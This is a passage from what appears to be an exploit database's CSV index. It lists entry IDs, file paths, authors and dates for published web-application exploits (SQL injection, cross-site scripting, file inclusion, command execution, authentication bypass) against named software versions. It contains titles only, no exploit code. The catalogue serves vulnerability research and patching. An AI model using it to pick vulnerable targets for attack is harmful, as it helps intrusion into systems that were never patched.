Execution",2004-07-17,aCiDBiTS,php,webapps, -24384,exploits/php/webapps/24384.txt,"PHP-Fusion Database Backup - Information Disclosure",2004-07-18,"Ahmad Muammar",php,webapps, -24385,exploits/asp/webapps/24385.txt,"Zixforum - ZixForum.mdb Database Disclosure",2004-07-19,"Security .Net Information",asp,webapps, -24389,exploits/php/webapps/24389.txt,"Sympa 4.x - New List HTML Injection",2004-08-21,"Jose Antonio",php,webapps, -24390,exploits/php/webapps/24390.txt,"Mantis 0.19 - Remote Server-Side Script Execution",2004-08-21,"Jose Antonio",php,webapps, -24391,exploits/php/webapps/24391.txt,"Mantis 0.x - Multiple Cross-Site Scripting Vulnerabilities",2004-08-21,"Jose Antonio",php,webapps, -24392,exploits/php/webapps/24392.php,"Mantis 0.x - New Account Signup Mass Emailing",2004-08-21,"Jose Antonio",php,webapps, -24393,exploits/php/webapps/24393.txt,"MyDms 1.4 - SQL Injection / Directory Traversal",2004-08-21,"Jose Antonio",php,webapps, -24397,exploits/asp/webapps/24397.txt,"Compulsive Media CNU5 - 'News.mdb' Database Disclosure",2004-08-23,"Security .Net Information",asp,webapps, -24399,exploits/php/webapps/24399.txt,"PhotoADay - 'Pad_selected' Cross-Site Scripting",2004-08-23,"King Of Love",php,webapps, -24400,exploits/cgi/webapps/24400.txt,"Axis Network Camera 2.x And Video Server 1-3 - 'virtualinput.cgi' Arbitrary Command Execution",2004-08-23,bashis,cgi,webapps, -24403,exploits/php/webapps/24403.txt,"eGroupWare 1.0 Calendar Module - 'date' Cross-Site Scripting",2004-08-23,"Joxean Koret",php,webapps, -24401,exploits/cgi/webapps/24401.txt,"Axis Network Camera 2.x And Video Server 1-3 - Directory Traversal",2004-08-23,bashis,cgi,webapps, -24402,exploits/cgi/webapps/24402.php,"Axis Network Camera 2.x And Video Server 1-3 - HTTP Authentication Bypass",2004-08-23,bashis,cgi,webapps, -24405,exploits/php/webapps/24405.txt,"SWsoft Plesk Reloaded 7.1 - 'Login_name' Cross-Site Scripting",2004-08-24,sourvivor,php,webapps, -24408,exploits/cgi/webapps/24408.txt,"Web-APP.Org WebAPP 0.8/0.9.x - Directory Traversal",2004-08-24,"Jerome Athias",cgi,webapps, -24410,exploits/php/webapps/24410.txt,"PHP Code Snippet Library 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-24,"Nikyt0x Argentina",php,webapps, -24415,exploits/php/webapps/24415.txt,"Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-28,CyruxNET,php,webapps, -24420,exploits/asp/webapps/24420.txt,"Web Animations Password Protect - Multiple Input Validation Vulnerabilities",2004-08-31,Criolabs,asp,webapps, -24422,exploits/asp/webapps/24422.txt,"Comersus Cart 5.0 - HTTP Response Splitting",2004-09-01,"Maestro De-Seguridad",asp,webapps, -24424,exploits/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",php,webapps, -24425,exploits/php/webapps/24425.txt,"phpWebSite 0.7.3/0.8.x/0.9.x - Comment Module CM_pid Cross-Site Scripting",2004-09-01,"GulfTech Security",php,webapps, -24432,exploits/windows/webapps/24432.txt,"Microsoft Internet Explorer 8/9 - Steal Any Cookie",2013-01-28,"Christian Haider",windows,webapps, -24441,exploits/hardware/webapps/24441.txt,"NETGEAR SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps, -24508,exploits/php/webapps/24508.txt,"Scripts Genie Gallery Personals - 'gallery.php?L' SQL Injection",2013-02-17,3spi0n,php,webapps, -24433,exploits/php/webapps/24433.txt,"PHP weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps, -24435,exploits/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,hardware,webapps, -24436,exploits/php/webapps/24436.txt,"Kohana Framework 2.3.3 - Directory Traversal",2013-01-29,Vulnerability-Lab,php,webapps, -24438,exploits/php/webapps/24438.txt,"DataLife Engine 9.7 - 'preview.php' PHP Code Injection",2013-01-28,EgiX,php,webapps, -24439,exploits/freebsd/webapps/24439.txt,"pfSense UTM Platform 2.0.1 - Cross-Site Scripting",2013-01-29,"Dimitris Strevinas",freebsd,webapps, -24442,exploits/hardware/webapps/24442.txt,"D-Link DCS Cameras - Multiple Vulnerabilities",2013-01-31,"Roberto Paleari",hardware,webapps, -24443,exploits/hardware/webapps/24443.txt,"Buffalo TeraStation TS-Series - Multiple Vulnerabilities",2013-01-31,"Andrea Fabrizi",hardware,webapps, -24445,exploits/php/webapps/24445.txt,"Simple Machine Forum 2.0.x < 2.0.4 - File Disclosure / Directory Traversal",2013-02-04,NightlyDev,php,webapps, -24449,exploits/jsp/webapps/24449.txt,"Cisco Unity Express - Multiple Vulnerabilities",2013-02-05,"Jacob Holcomb",jsp,webapps, -24451,exploits/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps, -24452,exploits/php/webapps/24452.txt,"AdaptCMS 2.0.4 - 'config.php?question' SQL Injection",2013-02-05,kallimero,php,webapps, -24453,exploits/hardware/webapps/24453.txt,"D-Link DIR-600 / DIR-300 (Rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps, -24454,exploits/php/webapps/24454.txt,"Free Monthly Websites 2.0 - Multiple Vulnerabilities",2013-02-05,X-Cisadane,php,webapps, -24456,exploits/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps, -24457,exploits/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,php,webapps, -24462,exploits/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,php,webapps, -24464,exploits/hardware/webapps/24464.txt,"NETGEAR DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps, -24465,exploits/php/webapps/24465.txt,"CubeCart 5.2.0 - 'cubecart.class.php' PHP Object Injection",2013-02-07,EgiX,php,webapps, -24466,exploits/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps, -24510,exploits/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php?id' SQL Injection",2013-02-17,3spi0n,php,webapps, -24472,exploits/php/webapps/24472.txt,"Easy Live Shop System - SQL Injection",2013-02-10,"Ramdan Yantu",php,webapps, -24503,exploits/hardware/webapps/24503.txt,"Edimax EW-7206-APg and EW-7209APg - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps, -24475,exploits/hardware/webapps/24475.txt,"Linksys E1500/E2500 - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps, -24476,exploits/hardware/webapps/24476.txt,"Linksys WAG200G - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps, -24477,exploits/hardware/webapps/24477.txt,"D-Link DIR-615 Rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps, -24478,exploits/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps, -24480,exploits/php/webapps/24480.txt,"IRIS Citations Management Tool - Authenticated Remote Command Execution",2013-02-11,aeon,php,webapps, -24481,exploits/php/webapps/24481.txt,"IP.Gallery 4.2.x/5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps, -24483,exploits/hardware/webapps/24483.txt,"TP-Link - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps, -24484,exploits/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps, -24520,exploits/php/webapps/24520.txt,"Piwigo 2.4.6 - '/install.php' Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps, -24509,exploits/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php?id' SQL Injection",2013-02-17,3spi0n,php,webapps, -24492,exploits/php/webapps/24492.php,"OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps, -24496,exploits/windows/webapps/24496.txt,"SonicWALL Scrutinizer 9.5.2 - SQL Injection",2013-02-14,Vulnerability-Lab,windows,webapps, -24497,exploits/hardware/webapps/24497.txt,"Transferable Remote 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,hardware,webapps, -24498,exploits/hardware/webapps/24498.txt,"OpenPLI 3.0 Beta (OpenPLi-beta-dm7000-20130127-272) - Multiple Vulnerabilities",2013-02-14,m-1-k-3,hardware,webapps, -24499,exploits/hardware/webapps/24499.txt,"Raidsonic IB-NAS5220 and IB-NAS4220-B - Multiple Vulnerabilities",2013-02-14,m-1-k-3,hardware,webapps, -24500,exploits/windows/webapps/24500.txt,"SonicWALL OEM Scrutinizer 9.5.2 - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,windows,webapps, -24501,exploits/php/webapps/24501.txt,"Ultra Light Forum - Persistent Cross-Site Scripting",2013-02-14,cr4wl3r,php,webapps, -24504,exploits/hardware/webapps/24504.txt,"TP-Link TL-WA701N / TL-WA701ND - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps, -24506,exploits/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,php,webapps, -24507,exploits/php/webapps/24507.txt,"ChillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",php,webapps, -24512,exploits/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php?id' SQL Injection",2013-02-17,3spi0n,php,webapps, -24513,exploits/hardware/webapps/24513.txt,"NETGEAR DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,hardware,webapps, -24514,exploits/php/webapps/24514.txt,"Scripts Genie Pet Rate Pro - Multiple Vulnerabilities",2013-02-18,TheMirkin,php,webapps, -24515,exploits/php/webapps/24515.txt,"Cometchat Application - Multiple Vulnerabilities",2013-02-18,z3r0sPlOiT,php,webapps, -24516,exploits/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php?cid' SQL Injection",2013-02-18,"Easy Laster",php,webapps, -24517,exploits/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps, -24522,exploits/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps, -24531,exploits/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,cr4wl3r,php,webapps, -24530,exploits/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps, -24533,exploits/php/webapps/24533.txt,"RTTucson Quotations Database Script - Authentication Bypass",2013-02-21,cr4wl3r,php,webapps, -24534,exploits/windows/webapps/24534.txt,"Alt-N MDaemon 12.5.6/13.0.3 - Email Body HTML/JS Injection",2013-02-21,"QSecure & Demetris Papapetrou",windows,webapps, -24535,exploits/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure & Demetris Papapetrou",windows,webapps, -24536,exploits/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps, -24537,exploits/php/webapps/24537.txt,"PHPMyRecipes 1.2.2 - 'viewrecipe.php?r_id' SQL Injection",2013-02-21,cr4wl3r,php,webapps, -24540,exploits/php/webapps/24540.pl,"Brewthology 0.1 - SQL Injection",2013-02-26,cr4wl3r,php,webapps, -24542,exploits/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection",2013-02-26,L0n3ly-H34rT,php,webapps, -24543,exploits/ios/webapps/24543.txt,"iOS IPMap 2.5 - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,ios,webapps, -24544,exploits/php/webapps/24544.txt,"MTP Image Gallery 1.0 - 'edit_photos.php?title' Cross-Site Scripting",2013-02-26,LiquidWorm,php,webapps, -24545,exploits/php/webapps/24545.txt,"MTP Guestbook 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps, -24546,exploits/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps, -24550,exploits/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps, -24551,exploits/php/webapps/24551.txt,"Joomla! 3.0.2 - 'highlight.php' PHP Object Injection",2013-02-27,EgiX,php,webapps, -24552,exploits/php/webapps/24552.txt,"WordPress Plugin Comment Rating 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps, -24560,exploits/php/webapps/24560.txt,"doorGets CMS - Cross-Site Request Forgery",2013-03-01,n0pe,php,webapps, -24561,exploits/php/webapps/24561.txt,"Piwigo 2.4.6 - Multiple Vulnerabilities",2013-03-01,"High-Tech Bridge SA",php,webapps, -24562,exploits/php/webapps/24562.txt,"PHP-Fusion 7.02.05 - Multiple Vulnerabilities",2013-03-01,waraxe,php,webapps, -24563,exploits/hardware/webapps/24563.txt,"D-Link DSL-2740B ADSL Router - Authentication Bypass",2013-03-04,"Ivano Binetti",hardware,webapps, -24564,exploits/php/webapps/24564.txt,"Nconf 1.3 - Multiple SQL Injections",2013-03-04,"Saadi Siddiqui",php,webapps, -24565,exploits/php/webapps/24565.txt,"SiteCubed MailWorks Professional - Authentication Bypass",2004-09-02,"Paul Craig",php,webapps, -24566,exploits/php/webapps/24566.txt,"CuteNews 0.88/1.3.x - 'index.php' Cross-Site Scripting",2004-09-02,Exoduks,php,webapps, -24573,exploits/multiple/webapps/24573.txt,"Keene Digital Media Server 1.0.2 - Cross-Site Scripting",2004-09-04,dr_insane,multiple,webapps, -24574,exploits/cgi/webapps/24574.txt,"Webmin 1.x - HTML Email Command Execution",2004-09-07,"Keigo Yamazaki",cgi,webapps, -24575,exploits/php/webapps/24575.txt,"PSNews 1.1 - 'No' Cross-Site Scripting",2004-09-05,"Michal Blaszczak",php,webapps, -24576,exploits/cgi/webapps/24576.txt,"UtilMind Solutions Site News 1.1 - Authentication Bypass",2004-09-07,anonymous,cgi,webapps, -24631,exploits/asp/webapps/24631.txt,"PD9 Software MegaBBS 2.0/2.1 - 'thread-post.asp' Multiple Header CRLF Injections",2004-09-27,pigrelax,asp,webapps, -24632,exploits/asp/webapps/24632.txt,"PD9 Software MegaBBS 2.0/2.1 - 'ladder-log.asp' Multiple SQL Injections",2004-09-27,pigrelax,asp,webapps, -24633,exploits/asp/webapps/24633.txt,"PD9 Software MegaBBS 2.0/2.1 - 'view-profile.asp' Multiple SQL Injections",2004-09-27,pigrelax,asp,webapps, -24582,exploits/php/webapps/24582.txt,"SAFE TEAM Regulus 2.2 - 'Custchoice.php' Update Your Password Action Information Disclosure",2004-09-07,masud_libra,php,webapps, -24583,exploits/php/webapps/24583.txt,"SAFE TEAM Regulus 2.2 - Customer Statistics Information Disclosure",2004-09-07,masud_libra,php,webapps, -24585,exploits/php/webapps/24585.txt,"BBS E-Market Professional bf_130 (1.3.0) - Remote File Inclusion",2004-09-09,"Ahmad Muammar",php,webapps, -24587,exploits/php/webapps/24587.txt,"PostNuke Modules Factory Subjects Module 2.0 - SQL Injection",2004-09-10,Criolabs,php,webapps, -24588,exploits/asp/webapps/24588.txt,"GetSolutions GetIntranet 2.2 - Multiple Remote Input Validation Vulnerabilities",2004-09-10,Criolabs,asp,webapps, -24589,exploits/asp/webapps/24589.txt,"GetSolutions GetInternet - Multiple SQL Injections",2004-09-10,Criolabs,asp,webapps, -24591,exploits/cgi/webapps/24591.txt,"PerlDesk Language Variable - Server-Side Script Execution",2004-09-13,"Nikyt0x Argentina",cgi,webapps, -24601,exploits/php/webapps/24601.txt,"BBS E-Market Professional bf_130 1.3.0 - Multiple File Disclosure Vulnerabilities",2004-09-15,"Jeong Jin-Seok",php,webapps, -24721,exploits/cgi/webapps/24721.txt,"TIPS MailPost 5.1.1 - 'APPEND' Cross-Site Scripting",2004-11-03,Procheckup,cgi,webapps, -24603,exploits/ios/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,ios,webapps, -24604,exploits/asp/webapps/24604.txt,"Snitz Forums 2000 - 'down.asp' HTTP Response Splitting",2004-09-16,"Maestro De-Seguridad",asp,webapps, -24611,exploits/cgi/webapps/24611.txt,"YaBB 1.x/9.1.2000 - Administrator Command Execution",2004-09-17,"GulfTech Security",cgi,webapps, -24612,exploits/cgi/webapps/24612.txt,"YaBB 1.x/9.1.2000 - YaBB.pl IMSend Cross-Site Scripting",2004-09-17,"GulfTech Security",cgi,webapps, -24613,exploits/php/webapps/24613.txt,"Remository - SQL Injection",2004-09-18,khoaimi,php,webapps, -24614,exploits/php/webapps/24614.txt,"Mambo Open Source 4.5.1 (1.0.9) - Cross-Site Scripting",2004-09-20,"Joxean Koret",php,webapps, -24615,exploits/php/webapps/24615.txt,"Mambo Open Source 4.5.1 (1.0.9) - 'Function.php' Arbitrary Command Execution",2004-09-20,"Joxean Koret",php,webapps, -24616,exploits/php/webapps/24616.txt,"TUTOS - 'file_overview.php?link_id' SQL Injection",2004-09-20,"Joxean Koret",php,webapps, -24617,exploits/php/webapps/24617.txt,"TUTOS - 'app_new.php?t' Cross-Site Scripting",2004-09-20,"Joxean Koret",php,webapps, -24625,exploits/asp/webapps/24625.txt,"FreezingCold Broadboard - 'search.asp' SQL Injection",2004-09-27,pigrelax,asp,webapps, -24626,exploits/asp/webapps/24626.txt,"FreezingCold Broadboard - 'profile.asp' SQL Injection",2004-09-27,pigrelax,asp,webapps, -24627,exploits/php/webapps/24627.txt,"Qool CMS 2.0 RC2 - Multiple Vulnerabilities",2013-03-07,LiquidWorm,php,webapps, -24629,exploits/php/webapps/24629.txt,"CosCMS 1.721 - OS Command Injection",2013-03-07,"High-Tech Bridge SA",php,webapps, -24630,exploits/cgi/webapps/24630.txt,"mnoGoSearch 3.3.12 (search.cgi) - Arbitrary File Read",2013-03-07,"Sergey Bobrov",cgi,webapps, -24638,exploits/php/webapps/24638.txt,"@lexPHPTeam @lex Guestbook 3.12 - PHP Remote File Inclusion",2004-09-27,"Himeur Nourredine",php,webapps, -24641,exploits/php/webapps/24641.txt,"WordPress 1.2 - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities",2004-09-28,"Thomas Waldegger",php,webapps, -24642,exploits/php/webapps/24642.txt,"WordPress 1.2 - 'admin-header.php?redirect_url' Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps, -24643,exploits/php/webapps/24643.txt,"WordPress 1.2 - 'bookmarklet.php' Multiple Cross-Site Scripting Vulnerabilities",2004-09-28,"Thomas Waldegger",php,webapps, -24644,exploits/php/webapps/24644.txt,"WordPress 1.2 - 'categories.php?cat_ID' Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps, -24645,exploits/php/webapps/24645.txt,"WordPress 1.2 - 'edit.php?s' Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps, -24646,exploits/php/webapps/24646.txt,"WordPress 1.2 - 'edit-comments.php' Multiple Cross-Site Scripting Vulnerabilities",2004-09-28,"Thomas Waldegger",php,webapps, -24647,exploits/php/webapps/24647.txt,"Parachat 5.5 - Directory Traversal",2004-09-28,"Donato Ferrante",php,webapps, -24648,exploits/php/webapps/24648.txt,"W-Agora 4.1.6 - 'a redir_url.php?key' SQL Injection",2004-09-30,"Alexander Antipov",php,webapps, -24649,exploits/php/webapps/24649.txt,"W-Agora 4.1.6 - 'a forgot_password.php?userid' Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps, -24650,exploits/php/webapps/24650.txt,"W-Agora 4.1.6 - 'a download_thread.php?thread' Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps, -24651,exploits/php/webapps/24651.txt,"W-Agora 4.1.6a - 'subscribe_thread.php' HTTP Response Splitting",2004-09-30,"Alexander Antipov",php,webapps, -24652,exploits/php/webapps/24652.txt,"W-Agora 4.1.6a - 'login.php?loginuser' Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps, -24655,exploits/php/webapps/24655.txt,"PHPLinks 2.1.x - Multiple Input Validation Vulnerabilities",2004-10-05,"LSS Security",php,webapps, -24657,exploits/php/webapps/24657.txt,"BlackBoard Internet NewsBoard System 1.5.1 - Remote File Inclusion",2004-10-06,"Lin Xiaofeng",php,webapps, -24659,exploits/php/webapps/24659.txt,"DCP-Portal 3.7/4.x/5.x - 'calendar.php' Multiple Cross-Site Scripting Vulnerabilities",2004-10-06,"Alexander Antipov",php,webapps, -24660,exploits/php/webapps/24660.txt,"DCP-Portal 3.7/4.x/5.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2004-10-06,"Alexander Antipov",php,webapps, -24661,exploits/php/webapps/24661.txt,"DCP-Portal 3.7/4.x/5.x - 'announcement.php?cid' Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps, -24662,exploits/php/webapps/24662.txt,"DCP-Portal 3.7/4.x/5.x - 'news.php?cid' Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps, -24663,exploits/php/webapps/24663.txt,"DCP-Portal 3.7/4.x/5.x - 'contents.php?cid' Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps, -24664,exploits/php/webapps/24664.txt,"DCP-Portal 3.7/4.x/5.x - Multiple HTML Injection Vulnerabilities",2004-10-06,"Alexander Antipov",php,webapps, -24665,exploits/php/webapps/24665.txt,"DCP-Portal 3.7/4.x/5.x - 'calendar.php' HTTP Response Splitting",2004-10-06,"Alexander Antipov",php,webapps, -24666,exploits/asp/webapps/24666.txt,"Microsoft ASP.NET 1.x - URI Canonicalization Unauthorized Web Access",2004-10-06,anonymous,asp,webapps, -24667,exploits/php/webapps/24667.txt,"WordPress 1.2 - 'wp-login.php' HTTP Response Splitting",2004-10-07,"Chaotic Evil",php,webapps, -24670,exploits/asp/webapps/24670.txt,"Go Smart Inc GoSmart Message Board - Multiple Input Validation Vulnerabilities",2004-10-11,"Positive Technologies",asp,webapps, -24671,exploits/asp/webapps/24671.txt,"DUclassified 4.x - 'adDetail.asp' Multiple SQL Injections",2004-10-11,"Soroosh Dalili",asp,webapps, -24672,exploits/asp/webapps/24672.txt,"DUclassmate 1.x - 'account.asp?MM-recordId' Arbitrary Password Modification",2004-10-11,"Soroosh Dalili",asp,webapps, -24673,exploits/asp/webapps/24673.txt,"DUforum 3.x - Login Form 'Password' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps, -24674,exploits/asp/webapps/24674.txt,"DUforum 3.x - 'messages.asp?FOR_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps, -24675,exploits/asp/webapps/24675.txt,"DUforum 3.x - 'messageDetail.asp?MSG_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps, -24676,exploits/php/webapps/24676.txt,"SCT Campus Pipeline 1.0/2.x/3.x - 'Render.UserLayoutRootNode.uP' Cross-Site Scripting",2004-10-13,"Matthew Oyer",php,webapps, -24680,exploits/cfm/webapps/24680.txt,"FuseTalk Forum 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-10-13,steven,cfm,webapps, -24683,exploits/php/webapps/24683.txt,"Pinnacle Systems ShowCenter 1.51 - 'SettingsBase.php' Cross-Site Scripting",2004-10-14,"Secunia Research",php,webapps, -24685,exploits/php/webapps/24685.txt,"CoolPHP 1.0 - Multiple Remote Input Validation Vulnerabilities",2004-10-16,R00tCr4ck,php,webapps, -24689,exploits/php/webapps/24689.sh,"cPanel 9.9.1 -R3 Front Page Extension - Installation Information Disclosure",2004-10-18,"Karol Wiesek",php,webapps, -24690,exploits/unix/webapps/24690.txt,"IBM Lotus Domino 6.x - Cross-Site Scripting / HTML Injection",2004-10-18,"Juan C Calderon",unix,webapps, -24692,exploits/php/webapps/24692.txt,"Jan Erdmann Jebuch 1.0 - HTML Injection",2004-10-19,PuWu,php,webapps, -24697,exploits/php/webapps/24697.txt,"S9Y Serendipity 0.x - 'exit.php' HTTP Response Splitting",2004-10-21,ChaoticEvil,php,webapps, -24698,exploits/php/webapps/24698.txt,"UBBCentral UBB.Threads 3.4/3.5 - 'Dosearch.php' SQL Injection",2004-10-21,"Florian Rock",php,webapps, -24700,exploits/cgi/webapps/24700.txt,"Netbilling NBMEMBER Script - Information Disclosure",2004-10-22,ls,cgi,webapps, -24702,exploits/php/webapps/24702.txt,"MoniWiki 1.0/1.1 - 'Wiki.php' Cross-Site Scripting",2004-10-25,"Jeremy Bae",php,webapps, -24703,exploits/cgi/webapps/24703.txt,"LinuxStat 2.x - Directory Traversal",2004-10-25,anonymous,cgi,webapps, -24922,exploits/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent Cross-Site Scripting",2013-04-08,"Luigi Vezzoso",multiple,webapps, -24889,exploits/php/webapps/24889.txt,"WordPress Plugin Mathjax Latex 1.1 - Cross-Site Request Forgery",2013-03-26,"Junaid Hussain",php,webapps, -24717,exploits/asp/webapps/24717.txt,"WebHost Automation Helm Control Panel 3.1.x - Multiple Input Validation Vulnerabilities",2004-11-02,"Behrang Fouladi",asp,webapps, -24718,exploits/php/webapps/24718.txt,"Goolery 0.3 - 'viewpic.php?conversation_id' Cross-Site Scripting",2004-11-02,Lostmon,php,webapps, -24719,exploits/php/webapps/24719.txt,"Goolery 0.3 - 'viewalbum.php?page' Cross-Site Scripting",2004-11-02,Lostmon,php,webapps, -24921,exploits/php/webapps/24921.txt,"OpenCart - Cross-Site Request Forgery (Change User Password)",2013-04-08,"Saadi Siddiqui",php,webapps, -24722,exploits/cgi/webapps/24722.txt,"TIPS MailPost 5.1.1 - Error Message Cross-Site Scripting",2004-11-03,Procheckup,cgi,webapps, -24723,exploits/cgi/webapps/24723.txt,"TIPS MailPost 5.1.1 - Remote File Enumeration",2004-11-03,"Gemma Hughes",cgi,webapps, -24729,exploits/php/webapps/24729.txt,"webcalendar 0.9.x - Multiple Vulnerabilities",2004-11-10,"Joxean Koret",php,webapps, -24731,exploits/php/webapps/24731.txt,"Aztek Forum 4.0 - Multiple Input Validation Vulnerabilities",2004-11-12,"benji lemien",php,webapps, -24732,exploits/php/webapps/24732.txt,"Phorum 5.0.x - 'FOLLOW.php' SQL Injection",2004-11-11,"Janek Vind",php,webapps, -24734,exploits/php/webapps/24734.txt,"chacmool Private Message System 1.1.3 - 'send.php?tid' Cross-Site Scripting",2004-11-12,"digital ex",php,webapps, -24735,exploits/php/webapps/24735.txt,"chacmool Private Message System 1.1.3 - 'send.php' Arbitrary Message Access",2004-11-12,"digital ex",php,webapps, -24736,exploits/php/webapps/24736.txt,"phpWebSite 0.7.3/0.8.x/0.9.3 - User Module HTTP Response Splitting",2004-11-04,"Maestro De-Seguridad",php,webapps, -24737,exploits/php/webapps/24737.txt,"Mark Zuckerberg Thefacebook - Multiple Cross-Site Scripting Vulnerabilities",2004-11-13,"Alex Lanstein",php,webapps, -24739,exploits/php/webapps/24739.txt,"PowerPortal 1.3 - SQL Injection",2004-11-14,ruggine,php,webapps, -24740,exploits/hardware/webapps/24740.txt,"AirDrive HD 1.6 iPad iPhone - Multiple Vulnerabilities",2013-02-24,Vulnerability-Lab,hardware,webapps, -24742,exploits/php/webapps/24742.txt,"Web Cookbook - Multiple SQL Injections",2013-03-13,"Saadat Ullah",php,webapps, -24744,exploits/multiple/webapps/24744.txt,"Apache Rave 0.11 < 0.20 - User Information Disclosure",2013-03-13,"Andreas Guth",multiple,webapps, -24748,exploits/php/webapps/24748.txt,"event Calendar - Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps, -24751,exploits/php/webapps/24751.pl,"phpBB 2.0.x - 'admin_cash.php' PHP Remote File Inclusion",2004-11-17,"Jerome Athias",php,webapps, -24752,exploits/php/webapps/24752.txt,"Invision Power Board 2.0 - 'index.php' Post Action SQL Injection",2004-11-18,anonymous,php,webapps, -24759,exploits/php/webapps/24759.txt,"IPBProArcade 2.5 - SQL Injection",2004-11-20,"axl daivy",php,webapps, -24762,exploits/php/webapps/24762.txt,"PHPKIT 1.6 - Multiple Input Validation Vulnerabilities",2004-11-22,Steve,php,webapps, -24766,exploits/php/webapps/24766.txt,"Nuked-klaN 1.x - Submit Link Function HTML Injection",2004-11-23,XioNoX,php,webapps, -24768,exploits/php/webapps/24768.txt,"SugarCRM 1.x/2.0 Module - 'record' SQL Injection",2004-11-23,"James Bercegay",php,webapps, -24769,exploits/php/webapps/24769.txt,"SugarCRM 1.x/2.0 Module - Traversal Arbitrary File Access",2004-11-23,"James Bercegay",php,webapps, -24771,exploits/php/webapps/24771.txt,"KorWeblog 1.6.2 - Remote Directory Listing",2004-11-24,"Jeremy Bae",php,webapps, -24772,exploits/php/webapps/24772.txt,"Zwiki 0.10/0.36.2 - Cross-Site Scripting",2004-11-24,"Jeremy Bae",php,webapps, -24773,exploits/jsp/webapps/24773.txt,"JSPWiki 2.1 - Cross-Site Scripting",2004-11-24,"Jeremy Bae",jsp,webapps, -24779,exploits/cgi/webapps/24779.txt,"InShop and InMail - Cross-Site Scripting",2004-11-25,"Carlos Ulver",cgi,webapps, -24782,exploits/php/webapps/24782.txt,"phpCMS 1.1/1.2 - Cross-Site 